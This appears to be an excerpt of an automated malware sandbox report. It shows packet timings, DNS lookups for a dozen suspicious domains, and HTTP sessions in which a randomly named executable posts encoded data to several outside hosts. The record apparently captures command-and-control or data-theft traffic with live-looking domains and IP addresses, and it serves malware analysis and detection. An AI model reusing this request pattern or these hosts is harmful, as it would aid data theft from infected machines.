                                                      Sep 25, 2024 05:37:18.894001007 CEST8049757107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:18.895275116 CEST4975780192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:18.902671099 CEST4975780192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:18.908121109 CEST8049757107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:19.986435890 CEST8049757107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:19.986500978 CEST8049757107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:19.986641884 CEST8049757107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:19.986649990 CEST4975780192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:19.986684084 CEST4975780192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:19.989919901 CEST4975780192.168.2.4107.163.130.249
                                                      Sep 25, 2024 05:37:19.996615887 CEST8049757107.163.130.249192.168.2.4
                                                      Sep 25, 2024 05:37:25.394825935 CEST4975880192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:25.399790049 CEST804975852.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:25.399883986 CEST4975880192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:25.430480003 CEST4975880192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:25.435415030 CEST804975852.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:25.903136015 CEST804975852.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:25.903193951 CEST4975880192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:26.932540894 CEST4975880192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:26.937393904 CEST804975852.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:27.950908899 CEST4975980192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:27.955905914 CEST804975952.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:27.955988884 CEST4975980192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:27.966228962 CEST4975980192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:27.971132040 CEST804975952.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:28.431551933 CEST804975952.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:28.431665897 CEST4975980192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:29.479360104 CEST4975980192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:29.484287024 CEST804975952.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:30.498008966 CEST4976080192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:30.503108025 CEST804976052.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:30.503242016 CEST4976080192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:30.514311075 CEST4976080192.168.2.452.223.13.41
                                                      Sep 25, 2024 05:37:30.519313097 CEST804976052.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:30.519330025 CEST804976052.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:30.519350052 CEST804976052.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:30.519360065 CEST804976052.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:30.519370079 CEST804976052.223.13.41192.168.2.4
                                                      Sep 25, 2024 05:37:30.519380093 CEST804976052.223.13.41192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Sep 25, 2024 05:38:50.899920940 CEST53551691.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 05:35:59.791604042 CEST | 192.168.2.4 | 1.1.1.1 | 0x156f | Standard query (0) | www.whats-in-the-box.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:15.515980005 CEST | 192.168.2.4 | 1.1.1.1 | 0x1d17 | Standard query (0) | www.1183377.app | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:29.676322937 CEST | 192.168.2.4 | 1.1.1.1 | 0xb7a8 | Standard query (0) | www.52ywq.vip | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:43.639635086 CEST | 192.168.2.4 | 1.1.1.1 | 0xb75f | Standard query (0) | www.zenscape.top | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:57.165522099 CEST | 192.168.2.4 | 1.1.1.1 | 0x9b92 | Standard query (0) | www.asociacia.online | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:37:10.889569998 CEST | 192.168.2.4 | 1.1.1.1 | 0x7c49 | Standard query (0) | www.93187.xyz | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:37:24.998491049 CEST | 192.168.2.4 | 1.1.1.1 | 0xc1e3 | Standard query (0) | www.insicilia.today | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:37:38.571176052 CEST | 192.168.2.4 | 1.1.1.1 | 0x8c00 | Standard query (0) | www.tempatmudisini01.click | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:37:56.454458952 CEST | 192.168.2.4 | 1.1.1.1 | 0xcf7f | Standard query (0) | www.o731lh.vip | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:10.093355894 CEST | 192.168.2.4 | 1.1.1.1 | 0x8bdb | Standard query (0) | www.consultarfacil.online | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:23.234899998 CEST | 192.168.2.4 | 1.1.1.1 | 0xbfab | Standard query (0) | www.broomeorchard.xyz | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:36.564459085 CEST | 192.168.2.4 | 1.1.1.1 | 0xc736 | Standard query (0) | www.suarahati20.xyz | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:50.373689890 CEST | 192.168.2.4 | 1.1.1.1 | 0x216f | Standard query (0) | www.nmh6.site | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 25, 2024 05:35:59.920726061 CEST | 1.1.1.1 | 192.168.2.4 | 0x156f | No error (0) | www.whats-in-the-box.org | whats-in-the-box.org | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:35:59.920726061 CEST | 1.1.1.1 | 192.168.2.4 | 0x156f | No error (0) | whats-in-the-box.org | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:35:59.920726061 CEST | 1.1.1.1 | 192.168.2.4 | 0x156f | No error (0) | whats-in-the-box.org | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | www.1183377.app | r83l7k.asiagoogleantiddoscdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | r83l7k.asiagoogleantiddoscdn.com | hse6978h2.g.asiagoogleantiddoscdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.224.27.173 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.224.27.171 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 156.251.233.85 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 156.251.233.84 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 156.251.233.3 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.225.60.99 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.225.60.59 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.224.37.78 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:16.386615992 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d17 | No error (0) | hse6978h2.g.asiagoogleantiddoscdn.com | | 23.224.37.76 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:29.849215031 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7a8 | No error (0) | www.52ywq.vip | 2rqff6.zxy-cname.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:36:29.849215031 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7a8 | No error (0) | 2rqff6.zxy-cname.com | xzwp.g.zxy-cname.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:36:29.849215031 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7a8 | No error (0) | xzwp.g.zxy-cname.com | | 52.187.43.73 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:29.849215031 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7a8 | No error (0) | xzwp.g.zxy-cname.com | | 13.76.137.44 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:29.849215031 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7a8 | No error (0) | xzwp.g.zxy-cname.com | | 52.187.43.40 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:29.849215031 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7a8 | No error (0) | xzwp.g.zxy-cname.com | | 52.230.28.86 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:29.849215031 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7a8 | No error (0) | xzwp.g.zxy-cname.com | | 13.76.139.81 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:29.849215031 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7a8 | No error (0) | xzwp.g.zxy-cname.com | | 52.187.42.58 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:43.827776909 CEST | 1.1.1.1 | 192.168.2.4 | 0xb75f | No error (0) | www.zenscape.top | | 199.192.21.169 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:36:57.223622084 CEST | 1.1.1.1 | 192.168.2.4 | 0x9b92 | No error (0) | www.asociacia.online | asociacia.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:36:57.223622084 CEST | 1.1.1.1 | 192.168.2.4 | 0x9b92 | No error (0) | asociacia.online | | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:37:11.239495039 CEST | 1.1.1.1 | 192.168.2.4 | 0x7c49 | No error (0) | www.93187.xyz | | 107.163.130.249 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:37:25.392357111 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1e3 | No error (0) | www.insicilia.today | | 52.223.13.41 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:37:38.993366003 CEST | 1.1.1.1 | 192.168.2.4 | 0x8c00 | No error (0) | www.tempatmudisini01.click | tempatmudisini01.click | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:37:38.993366003 CEST | 1.1.1.1 | 192.168.2.4 | 0x8c00 | No error (0) | tempatmudisini01.click | | 103.21.221.4 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:37:56.465569973 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf7f | No error (0) | www.o731lh.vip | o731lh.vip | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:37:56.465569973 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf7f | No error (0) | o731lh.vip | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:37:56.465569973 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf7f | No error (0) | o731lh.vip | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:10.106476068 CEST | 1.1.1.1 | 192.168.2.4 | 0x8bdb | No error (0) | www.consultarfacil.online | consultarfacil.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:38:10.106476068 CEST | 1.1.1.1 | 192.168.2.4 | 0x8bdb | No error (0) | consultarfacil.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:10.106476068 CEST | 1.1.1.1 | 192.168.2.4 | 0x8bdb | No error (0) | consultarfacil.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:23.256885052 CEST | 1.1.1.1 | 192.168.2.4 | 0xbfab | No error (0) | www.broomeorchard.xyz | | 15.197.204.56 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:23.256885052 CEST | 1.1.1.1 | 192.168.2.4 | 0xbfab | No error (0) | www.broomeorchard.xyz | | 3.33.243.145 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:36.939099073 CEST | 1.1.1.1 | 192.168.2.4 | 0xc736 | No error (0) | www.suarahati20.xyz | suarahati20.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 05:38:36.939099073 CEST | 1.1.1.1 | 192.168.2.4 | 0xc736 | No error (0) | suarahati20.xyz | | 198.252.106.191 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 05:38:50.899920940 CEST | 1.1.1.1 | 192.168.2.4 | 0x216f | No error (0) | www.nmh6.site | | 43.154.104.247 | A (IP address) | IN (0x0001) | false
                                                      • www.whats-in-the-box.org
                                                      • www.1183377.app
                                                      • www.52ywq.vip
                                                      • www.zenscape.top
                                                      • www.asociacia.online
                                                      • www.93187.xyz
                                                      • www.insicilia.today
                                                      • www.tempatmudisini01.click
                                                      • www.o731lh.vip
                                                      • www.consultarfacil.online
                                                      • www.broomeorchard.xyz
                                                      • www.suarahati20.xyz
                                                      • www.nmh6.site
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 3.33.130.190 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 05:35:59.952097893 CEST | 478 | OUT | GET /i7xp/?Vvn=XtJLE6KXyHJ010P&N0spilI0=1hYOXgym/+H9levHoL4uDmSoKaP5f04LAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+ByycC+m3CBgf9UgTY0pVgzUvtxB6m49SfQluc= HTTP/1.1
                                                      Host: www.whats-in-the-box.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Sep 25, 2024 05:36:00.465517044 CEST | 404 | IN | HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:36:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 26 4e 30 73 70 69 6c 49 30 3d 31 68 59 4f 58 67 79 6d 2f 2b 48 39 6c 65 76 48 6f 4c 34 75 44 6d 53 6f 4b 61 50 35 66 30 34 4c 41 75 42 45 50 53 46 6d 4e 42 57 57 31 55 6f 42 47 6d 37 6b 72 4d 61 6b 6f 49 66 32 54 38 50 43 62 61 6b 47 6b 35 63 4a 59 73 4b 39 49 7a 39 30 66 2b 42 79 79 63 43 2b 6d 33 43 42 67 66 39 55 67 54 59 30 70 56 67 7a 55 76 74 78 42 36 6d 34 39 53 66 51 6c 75 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vvn=XtJLE6KXyHJ010P&N0spilI0=1hYOXgym/+H9levHoL4uDmSoKaP5f04LAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+ByycC+m3CBgf9UgTY0pVgzUvtxB6m49SfQluc="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 23.224.27.173 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 05:36:16.405566931 CEST | 727 | OUT | POST /8z5k/ HTTP/1.1
                                                      Host: www.1183377.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.1183377.app
                                                      Referer: http://www.1183377.app/8z5k/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 72 2b 34 33 68 4f 5a 54 39 46 6d 68 35 33 41 64 48 38 6d 51 6b 64 75 67 41 4e 49 5a 7a 58 52 62 4a 55 66 55 5a 46 6c 49 45 4b 64 32 61 43 38 68 6c 46 42 2f 76 53 65 57 63 78 32 30 58 44 43 36 6e 63 70 6e 45 78 61 65 5a 78 57 33 67 57 4a 71 6d 42 36 57 75 4f 78 73 72 36 55 55 56 30 37 6b 53 2b 56 68 64 5a 6e 47 31 43 6f 42 35 50 61 72 6f 79 78 48 46 4d 51 58 4e 41 2f 6a 62 5a 78 4b 43 39 72 6e 50 49 72 6a 37 6d 35 61 37 67 45 63 45 4f 68 75 37 4b 6e 43 50 4a 44 2f 65 7a 63 43 70 47 6f 68 32 39 31 6c 6a 67 66 64 6a 42 77 5a 49 37 58 6e 5a 67 3d 3d
                                                      Data Ascii: N0spilI0=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu7KnCPJD/ezcCpGoh291ljgfdjBwZI7XnZg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 23.224.27.173 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 05:36:18.960832119 CEST | 747 | OUT | POST /8z5k/ HTTP/1.1
                                                      Host: www.1183377.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.1183377.app
                                                      Referer: http://www.1183377.app/8z5k/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 78 65 6f 33 78 64 78 54 30 46 6d 69 38 33 41 64 63 73 6d 71 6b 64 71 67 41 4e 67 4a 79 6b 31 62 4d 45 76 55 59 41 46 49 46 4b 64 32 56 69 39 72 71 6c 42 32 76 53 54 72 63 7a 69 30 58 48 53 36 6e 63 35 6e 46 43 43 64 57 42 57 31 31 47 4a 6f 6f 68 36 57 75 4f 78 73 72 35 6f 36 56 30 7a 6b 54 4b 70 68 64 34 6e 4a 71 79 6f 4f 78 76 61 72 73 79 78 44 46 4d 51 68 4e 46 58 46 62 62 35 4b 43 34 50 6e 50 5a 72 6b 77 6d 35 41 32 41 46 76 46 72 45 36 69 72 71 68 4b 61 69 64 66 67 52 6a 6f 41 35 37 6e 4d 55 79 78 67 37 75 2b 47 35 74 46 34 71 75 43 74 62 78 59 45 4f 61 30 52 6e 6a 6d 41 36 63 67 48 35 57 63 65 51 3d
                                                      Data Ascii: N0spilI0=/3ymXrZusQ/txeo3xdxT0Fmi83AdcsmqkdqgANgJyk1bMEvUYAFIFKd2Vi9rqlB2vSTrczi0XHS6nc5nFCCdWBW11GJooh6WuOxsr5o6V0zkTKphd4nJqyoOxvarsyxDFMQhNFXFbb5KC4PnPZrkwm5A2AFvFrE6irqhKaidfgRjoA57nMUyxg7u+G5tF4quCtbxYEOa0RnjmA6cgH5WceQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 23.224.27.173 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 05:36:21.498716116 CEST | 10829 | OUT | POST /8z5k/ HTTP/1.1
                                                      Host: www.1183377.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.1183377.app
                                                      Referer: http://www.1183377.app/8z5k/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 78 65 6f 33 78 64 78 54 30 46 6d 69 38 33 41 64 63 73 6d 71 6b 64 71 67 41 4e 67 4a 79 6b 39 62 4d 56 50 55 5a 68 46 49 47 4b 64 32 63 43 39 71 71 6c 41 6b 76 53 61 67 63 7a 75 43 58 42 4f 36 68 2b 42 6e 43 7a 43 64 42 52 57 31 71 32 4a 74 6d 42 37 63 75 4f 68 6f 72 35 34 36 56 30 7a 6b 54 4d 4e 68 62 70 6e 4a 6f 79 6f 42 35 50 61 2f 6f 79 78 76 46 4d 59 66 4e 46 62 7a 62 71 5a 4b 43 59 66 6e 4e 72 7a 6b 39 6d 35 65 36 67 46 33 46 72 41 4d 69 76 4b 58 4b 62 48 77 66 6e 5a 6a 6f 6c 51 6e 2f 59 55 65 72 67 57 30 39 31 42 38 4a 50 4b 51 44 75 66 46 4a 58 57 52 32 6a 33 4d 71 41 37 77 30 31 70 58 43 49 66 55 49 6a 43 4d 65 5a 53 51 37 77 79 44 78 7a 32 4f 69 55 4d 33 65 70 61 43 73 50 64 76 79 76 56 4a 4c 39 64 4a 61 4e 6b 49 47 76 37 47 42 6e 4b 48 37 6e 36 36 6d 6a 6b 78 39 6e 45 55 53 4d 76 6c 41 4a 69 62 44 63 47 4f 65 6c 35 6d 32 4c 68 49 53 30 51 52 65 4c 78 56 4b 61 65 67 70 6a 51 75 31 4b 58 57 31 2b 73 55 48 4d 65 34 74 63 42 64 59 [TRUNCATED]
Data Ascii: N0spilI0= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 23.224.27.173 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 05:36:24.040805101 CEST | 469 | OUT | GET /8z5k/?N0spilI0=y1aGUeBTtCWB8PYk9+ZY5neg5WJlbc6kuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlfmqzqWQ0oAXUsuE4toY6QlP7A8hrX6vWgTw=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.1183377.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 52.187.43.73 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 05:36:29.874146938 CEST | 721 | OUT | POST /4i87/ HTTP/1.1
                                                      Host: www.52ywq.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.52ywq.vip
                                                      Referer: http://www.52ywq.vip/4i87/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 65 4f 61 38 76 37 46 34 51 75 31 71 73 5a 51 31 55 56 72 56 31 36 76 30 51 34 46 63 4c 55 54 66 53 58 33 49 30 46 79 42 78 6a 48 51 49 61 73 42 68 75 68 57 67 77 58 6a 6c 4f 2f 66 62 50 70 46 4f 46 79 31 32 5a 33 44 67 39 30 61 71 48 31 44 71 49 77 58 63 66 67 73 4d 33 50 5a 54 49 62 56 78 68 55 38 4b 44 45 6a 79 58 47 43 45 44 38 48 63 57 6d 6c 47 49 4d 73 4a 5a 69 54 57 77 6f 63 6a 49 4f 61 56 4d 48 66 6c 75 67 4d 37 58 4a 54 64 66 38 58 72 33 46 79 6d 47 5a 4d 6b 35 35 55 32 34 68 46 70 49 69 65 42 74 55 37 33 4c 75 66 48 7a 73 73 78 67 3d 3d
                                                      Data Ascii: N0spilI0=gVdAM/Wp0z6xeOa8v7F4Qu1qsZQ1UVrV16v0Q4FcLUTfSX3I0FyBxjHQIasBhuhWgwXjlO/fbPpFOFy12Z3Dg90aqH1DqIwXcfgsM3PZTIbVxhU8KDEjyXGCED8HcWmlGIMsJZiTWwocjIOaVMHflugM7XJTdf8Xr3FymGZMk55U24hFpIieBtU73LufHzssxg==
Sep 25, 2024 05:36:30.941747904 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 25 Sep 2024 03:36:30 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://6329.vhjhbv.com/4i87/
                                                      Server: CDNRay
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


